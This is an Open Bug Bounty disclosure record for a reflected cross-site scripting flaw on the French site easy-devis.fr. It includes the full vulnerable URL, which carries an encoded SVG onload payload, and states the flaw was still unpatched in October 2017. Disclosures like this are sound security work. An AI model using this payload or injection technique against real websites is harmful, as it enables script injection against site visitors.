easy-devis.fr XSS vulnerability

2017-07-26T12:45:00
ID OBB:269546
Type openbugbounty
Reporter BesafeCybersecurity
Modified 2017-10-24T13:17:00

Description

Vulnerable URL:
http://www.easy-devis.fr/recherche.html?s=999%22%3E%3Csvg%2Fonload%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 24.10.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1262678
VIP website status:| No
Check easy-devis.fr SSL connection:| (Grade: B)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 July, 2017 12:45 GMT
Generic security notifications sent to website owner| 26 July, 2017 12:47 GMT
Vulnerability details disclosed by researcher| 24 October, 2017 13:17 GMT